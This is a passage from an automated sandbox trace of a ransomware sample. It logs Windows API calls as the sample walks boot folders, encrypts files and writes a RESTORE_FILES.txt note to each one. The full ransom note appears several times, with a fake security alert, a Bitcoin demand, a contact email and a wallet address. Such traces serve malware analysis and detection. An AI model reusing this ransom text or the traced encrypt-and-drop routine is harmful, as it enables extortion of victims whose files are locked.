lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0044.587] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.587] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.587] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0044.587] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".protected") returned 0x0 [0044.587] lstrcmpW (lpString1="chs_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.587] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.588] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.588] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="System Volume Information") returned -1 [0044.588] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0044.588] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".protected") returned 0x0 [0044.588] lstrcmpW (lpString1="cht_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.588] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.589] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="System Volume Information") returned -1 [0044.589] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0044.589] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".protected") returned 0x0 [0044.589] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.589] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.589] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="System Volume Information") returned -1 [0044.589] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0044.589] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".protected") returned 0x0 [0044.589] lstrcmpW (lpString1="kor_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.589] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.590] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files (x86)") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="System Volume Information") returned 1 [0044.590] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0044.590] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".protected") returned 0x0 [0044.590] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="RESTORE_FILES.txt") returned 1 [0044.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.590] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.590] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.590] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\RESTORE_FILES.txt") returned 35 [0044.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fonts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.689] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.689] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.690] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.690] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.690] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.690] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.690] CloseHandle (hObject=0xac) returned 1 [0044.690] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files (x86)") returned -1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0044.690] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0044.690] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0044.690] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0044.691] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0044.691] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0044.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.691] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.691] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.691] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0044.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.691] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.691] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.691] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.692] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.692] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0044.692] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.692] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.692] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0044.692] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.692] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.692] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.692] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.692] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.692] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.692] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\RESTORE_FILES.txt") returned 35 [0044.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fr-fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.692] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.693] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.693] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.693] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.693] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.693] CloseHandle (hObject=0xac) returned 1 [0044.693] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files (x86)") returned -1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0044.693] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0044.693] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0044.693] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0044.693] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0044.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.694] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0044.694] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.694] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.694] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0044.694] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.694] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.694] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.694] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0044.694] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.694] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.694] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.694] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.695] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.695] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\RESTORE_FILES.txt") returned 35 [0044.695] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\RESTORE_FILES.txt" (normalized: "c:\\boot\\hu-hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.695] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.695] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.696] lstrlenA 